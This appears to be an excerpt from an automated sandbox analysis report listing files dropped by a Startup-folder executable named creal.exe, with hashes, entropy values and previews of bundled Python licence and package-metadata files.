                                                                                                                                                                                                              Size (bytes):1332005
                                                                                                                                                                                                              Entropy (8bit):5.586329031215426
                                                                                                                                                                                                              Encrypted:false
Malicious: false

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 318464
Entropy (8bit): 6.432287819001792
Encrypted: false
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: ASCII text
Category: dropped
Size (bytes): 290282
Entropy (8bit): 6.048183244201235
Encrypted: false
Malicious: false

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 10752
Entropy (8bit): 4.674392865869017
Encrypted: false
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 122880
Entropy (8bit): 5.917175475547778
Encrypted: false
Malicious: false

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: ASCII text
Category: dropped
Size (bytes): 4
Entropy (8bit): 1.5
Encrypted: false
Malicious: false
Preview: pip.

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: ASCII text
Category: dropped
Size (bytes): 197
Entropy (8bit): 4.61968998873571
Encrypted: false
Malicious: false
Preview: This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: ASCII text
Category: dropped
Size (bytes): 11360
Entropy (8bit): 4.426756947907149
Encrypted: false
Malicious: false
Preview: . Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
File Type: ASCII text
Category: dropped
Size (bytes): 1532
Entropy (8bit): 5.058591167088024
Encrypted: false
                                                                                                                                                                                                              SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                              MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                              SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                              SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                              SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5292
                                                                                                                                                                                                              Entropy (8bit):5.115440205505611
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:DxapqZink/QIHQIyzQIZQILuQIR8vtklGovxNx6sWwCvCCcTKvIrrg9BMM6VwDjz:sJnkoBs/sqLz8cTKvIrrUiM6VwDjyeWs
                                                                                                                                                                                                              MD5:137D13F917D94C83137A0FA5AE12B467
                                                                                                                                                                                                              SHA1:01E93402C225BF2A4EE59F9A06F8062CB5E4801E
                                                                                                                                                                                                              SHA-256:36738E6971D2F20DB78433185A0EF7912A48544AA6FF7006505A7DC785158859
                                                                                                                                                                                                              SHA-512:1B22CBC6E22FA5E2BD5CC4A370443A342D00E7DD53330A4000E9A680DE80262BCA7188764E3568944D01025188291602AC8C53C971630984FBD9FA7D75AAB124
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Metadata-Version: 2.1..Name: cryptography..Version: 41.0.7..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15240
                                                                                                                                                                                                              Entropy (8bit):5.547872011537696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:3Xp2U/ZfaigdSwJN5i6s7B0Ppzx6uvndLE4:3oUxfzgFthE4
                                                                                                                                                                                                              MD5:8F86F467A47ABCE1671C9BB0BF919DC0
                                                                                                                                                                                                              SHA1:0AD1FBC5E7BF617F23630A79DA3CC32203D5937B
                                                                                                                                                                                                              SHA-256:D668ACCD4D48406C8E76C84E38B5CA1D61BC72CA6D574948F71E0AF83AA03E87
                                                                                                                                                                                                              SHA-512:C849F52DBEAEF252052C91C6177EF1E4343D9C92BBB8A64E9C0670424A3CCE9EECC2A886EFB690FC8EFE4D3AF965E2CBAAF8B81B3D27BB7EC937956A7884B0F2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:cryptography-41.0.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-41.0.7.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-41.0.7.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-41.0.7.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-41.0.7.dist-info/METADATA,sha256=NnOOaXHS8g23hDMYWg73kSpIVEqm_3AGUFp9x4UViFk,5292..cryptography-41.0.7.dist-info/RECORD,,..cryptography-41.0.7.dist-info/WHEEL,sha256=-EX5DQzNGQEoyL99Q-0P0-D-CXbfqafenaAeiSQ_Ufk,100..cryptography-41.0.7.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=uPXMbbcptt7EzZ_jllGRx0pVdMn-NBsAM4L74hOv-b0,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__init__.cpython-312.pyc,,..cryptography/
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):100
                                                                                                                                                                                                              Entropy (8bit):5.0203365408149025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKc/SKQLn:RtBMwlVCxWKxDQLn
                                                                                                                                                                                                              MD5:4B432A99682DE414B29A683A3546B69F
                                                                                                                                                                                                              SHA1:F59C5016889EE5E9F62D09B22AEFBC2211A56C93
                                                                                                                                                                                                              SHA-256:F845F90D0CCD190128C8BF7D43ED0FD3E0FE0976DFA9A7DE9DA01E89243F51F9
                                                                                                                                                                                                              SHA-512:CBBF10E19B6F4072C416EA95D7AE259B9C5A1B89068B7B6660B7C637D6F2437AEA8D8202A2E26A0BEC36DAECD8BBB6B59016FC2DDEB13C545F0868B3E15479CA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp37-abi3-win_amd64..
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                              Entropy (8bit):3.2389012566026314
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:cOv:Nv
                                                                                                                                                                                                              MD5:E7274BD06FF93210298E7117D11EA631
                                                                                                                                                                                                              SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                                                                                                                                              SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                                                                                                                                              SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:cryptography.
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6673920
                                                                                                                                                                                                              Entropy (8bit):6.582002531606852
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                              MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                              SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                              SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                              SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4926
                                                                                                                                                                                                              Entropy (8bit):5.016007756463111
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Dr8ZSaChm1nTR9GDbHR2ie7QfYpulJGc+vFZoDN00x2jZ2SBXZJSwTE:5hm9fGDbHR2iOQfyurz+D00vJHJSwTE
                                                                                                                                                                                                              MD5:B0BDE2A3F0CD2C95203E4FABB5A8FEB6
                                                                                                                                                                                                              SHA1:85958E584060BDF8D79B52265F93A80CE9F2EEE7
                                                                                                                                                                                                              SHA-256:62FB03CC1D7DE1D50DE44D405B0708302B12F4CCD7FD216D9AE8863DCA767A67
                                                                                                                                                                                                              SHA-512:03537755EB30AE048376B3E161BDAAF8DBD9D5C0968B5A10474C93854E8E4B18F3889EABBBBBA0DBA0EED238A8D165276ABE68452A6C4C8F16E9DFC6159122F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib-metadata.Version: 7.0.1.Summary: Read metadata from Python packages.Home-page: https://github.com/python/importlib_metadata.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: perf
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2107
                                                                                                                                                                                                              Entropy (8bit):5.63905602989132
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:GnuXtaGGJl/gYb9X7vjXzeom9pvJq/fwJOfYCqO1B4N/3WJV:JX8gYb1nzeRDJsoIYHO1B49qV
                                                                                                                                                                                                              MD5:8944FAAF8C624603217ABA7B18C3B8FB
                                                                                                                                                                                                              SHA1:4CF147DD8E575418A20C702B7ECF8EB0816EECFF
                                                                                                                                                                                                              SHA-256:5A193CAB91D31BA1849A5E705064C50B54A60680F3AE92B431D9686E551B937C
                                                                                                                                                                                                              SHA-512:EA2D49C628D8139062ED44CF3815F21F4B796D6AEF9FEDCDCF79C5D647E904F00F28FBE9DEB604AF45A78309621C5DA36C64E9239E09D73F271C40FFAAB47D60
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:importlib_metadata-7.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-7.0.1.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-7.0.1.dist-info/METADATA,sha256=YvsDzB194dUN5E1AWwcIMCsS9MzX_SFtmuiGPcp2emc,4926..importlib_metadata-7.0.1.dist-info/RECORD,,..importlib_metadata-7.0.1.dist-info/WHEEL,sha256=oiQVh_5PnQM0E3gPdiz09WCNmwiHDMaGer_elqB3coM,92..importlib_metadata-7.0.1.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=CrDhGQz3SCK5Cct82OvmGzqzOqneJn3jLvvfmSx8nCs,31551..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycache__/_functools.cpython-312.pyc,,..importlib_metadata/__pycache__/_itertools.cpython-312.pyc,,..imp
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                              Entropy (8bit):4.8343614255301075
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tPCCfA5S:RtBMwlVCxWBBf
                                                                                                                                                                                                              MD5:A227BF38FB17005B3BDB56CCC428B1BB
                                                                                                                                                                                                              SHA1:502F95DA3089549E19C451737AA262E45C5BC3BC
                                                                                                                                                                                                              SHA-256:A2241587FE4F9D033413780F762CF4F5608D9B08870CC6867ABFDE96A0777283
                                                                                                                                                                                                              SHA-512:A0BA37A0B2F3D4AE1EE2B09BB13ED20912DB4E6A009FE9BA9414830AD4FDBF58571E195ABBE0D19F5582E2CF958CFB49FFDACD7C5182008699F92A0F5EEC6C41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                              Entropy (8bit):3.536886723742169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                              MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                              SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                              SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                              SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:importlib_metadata.
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5162776
                                                                                                                                                                                                              Entropy (8bit):5.958207976652471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:S3+FRtLtlVriXpshX179Cahd4tC9P1+1CPwDvt3uFlDCi:ASRtLtvd99Cahd4tC9w1CPwDvt3uFlDz
                                                                                                                                                                                                              MD5:51E8A5281C2092E45D8C97FBDBF39560
                                                                                                                                                                                                              SHA1:C499C810ED83AAADCE3B267807E593EC6B121211
                                                                                                                                                                                                              SHA-256:2A234B5AA20C3FAECF725BBB54FB33F3D94543F78FA7045408E905593E49960A
                                                                                                                                                                                                              SHA-512:98B91719B0975CB38D3B3C7B6F820D184EF1B64D38AD8515BE0B8B07730E2272376B9E51631FE9EFD9B8A1709FEA214CF3F77B34EEB9FD282EB09E395120E7CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39696
                                                                                                                                                                                                              Entropy (8bit):6.641880464695502
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                              MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                              SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                              SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                              SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):790296
                                                                                                                                                                                                              Entropy (8bit):5.607732992846443
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:7aO1lo7USZGjweMMHO4+xuVg7gCl2VdhMd1DdwMVn4TERUr3zgKpJJ/wknofFe9A:FkeMKOr97gCAE35gEGzLpwknofFe9XbE
                                                                                                                                                                                                              MD5:BFC834BB2310DDF01BE9AD9CFF7C2A41
                                                                                                                                                                                                              SHA1:FB1D601B4FCB29FF1B13B0D2ED7119BD0472205C
                                                                                                                                                                                                              SHA-256:41AD1A04CA27A7959579E87FBBDA87C93099616A64A0E66260C983381C5570D1
                                                                                                                                                                                                              SHA-512:6AF473C7C0997F2847EBE7CEE8EF67CD682DEE41720D4F268964330B449BA71398FDA8954524F9A97CC4CDF9893B8BDC7A1CF40E9E45A73F4F35A37F31C6A9C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):199448
                                                                                                                                                                                                              Entropy (8bit):6.385306498353421
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:jJB/b2LOWs5LS04q1uqtF+ai7dYbmdRLjDxKyw6XUWdRBIpLhCujk:dB6yx5LT1gqtF+XGeL/xiBoR4g
                                                                                                                                                                                                              MD5:E2D1C738D6D24A6DD86247D105318576
                                                                                                                                                                                                              SHA1:384198F20724E4EDE9E7B68E2D50883C664EEE49
                                                                                                                                                                                                              SHA-256:CDC09FBAE2F103196215FACD50D108BE3EFF60C8EE5795DCC80BF57A0F120CDF
                                                                                                                                                                                                              SHA-512:3F9CB64B4456438DEA82A0638E977F233FAF0A08433F01CA87BA65C7E80B0680B0EC3009FA146F02AE1FDCC56271A66D99855D222E77B59A1713CAF952A807DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68376
                                                                                                                                                                                                              Entropy (8bit):6.148687003588085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:/BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM8:pDmF61JFn+/OJBIpL0j7Sy5xH
                                                                                                                                                                                                              MD5:4038AF0427BCE296CA8F3E98591E0723
                                                                                                                                                                                                              SHA1:B2975225721959D87996454D049E6D878994CBF2
                                                                                                                                                                                                              SHA-256:A5BB3EB6FDFD23E0D8B2E4BCCD6016290C013389E06DAAE6CB83964FA69E2A4F
                                                                                                                                                                                                              SHA-512:DB762442C6355512625B36F112ECA6923875D10AAF6476D79DC6F6FFC9114E8C7757AC91DBCD1FB00014122BC7F656115160CF5D62FA7FA1BA70BC71346C1AD3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7003928
                                                                                                                                                                                                              Entropy (8bit):5.780799677504345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:2OUmnjqB6bHMYM3RNgqKutvDHDMiEtYkzuv:2OUmn+MnM3R+qYi3kzuv
                                                                                                                                                                                                              MD5:48EBFEFA21B480A9B0DBFC3364E1D066
                                                                                                                                                                                                              SHA1:B44A3A9B8C585B30897DDC2E4249DFCFD07B700A
                                                                                                                                                                                                              SHA-256:0CC4E557972488EB99EA4AEB3D29F3ADE974EF3BCD47C211911489A189A0B6F2
                                                                                                                                                                                                              SHA-512:4E6194F1C55B82EE41743B35D749F5D92A955B219DECACF9F1396D983E0F92AE02089C7F84A2B8296A3062AFA3F9C220DA9B7CD9ED01B3315EA4A953B4ECC6CE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
